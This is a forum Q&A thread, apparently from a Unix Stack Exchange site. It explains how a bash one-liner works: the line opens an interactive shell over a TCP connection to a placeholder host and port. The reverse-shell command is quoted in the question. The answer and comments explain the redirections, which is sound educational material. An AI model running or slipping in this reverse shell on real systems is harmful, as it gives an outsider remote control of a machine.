20

I tried

bash -i >& /dev/tcp/HOST/PORT 0>&1

but it does not seem to work behind firewalls. What does this code actually do, which ports are forwarded and could it work behind firewalls?

1 Answer 1

25

This snippet runs a new interactive instance of bash (bash -i), on a TCP connection to the specified port on the specified host which is created for the duration of the bash process. Standard output and standard error are sent through this connection (>& /dev/tcp/HOST/PORT), and standard input is read through this connection (0>&1 — this should be 0<&1 but 0>&1 works too).

There is no port forwarding going on. Obviously, a TCP server of some kind has to be listening and accepting connections on that HOST:PORT, and the firewall has to let the connection through.

5
  • What connection is '/dev/tcp/HOST/PORT' Where is the host defined and where is the port defined? Commented Feb 20, 2014 at 0:25
  • 2
    @Helos Did you literally see /dev/tcp/HOST/PORT? I assumed that you'd replaced a name by HOST and a number by PORT. Otherwise you'd get an error message from bash. Since you didn't mention any error message, I presume that you didn't see one. Commented Feb 20, 2014 at 0:27
  • 3
    @Gilles, I can't digest the 0<&1 part. I read it as 'take bash stdout (&1) and pipe it into bash stdin (0)', which makes sense. Can you please explain how this part works? Commented Jun 1, 2015 at 21:44
  • 7
    @golem This is a redirection. No pipe is involved. 0<&1 means connect whatever is currently opened on file descriptor 1 to file descriptor 0. Since the previous redirection >& /dev/tcp/HOST/PORT connected fd 1 (the default for an output redirection) to /dev/tcp/HOST/PORT, i.e. opened a TCP socket, this duplicates the TCP connection to file descriptor 0 (i.e. the same socket is now also open on fd 0, this is different from 0</dev/tcp/HOST/PORT which would open a different socket to the same server). Commented Jun 1, 2015 at 22:43
  • Connecting was a keyword to my understanding; calling the process piping was indeed what confused me. Commented Jun 2, 2015 at 0:52

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.